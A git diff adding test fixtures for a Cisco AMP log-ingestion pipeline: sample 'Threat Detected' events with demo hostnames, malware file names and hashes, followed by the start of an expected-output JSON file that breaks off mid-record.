+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json
new file mode 100644
index 00000000000..fb0cb6dbbed
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json
@@ -0,0 +1,3825 @@
+{
+    "expected": [
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581709368Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 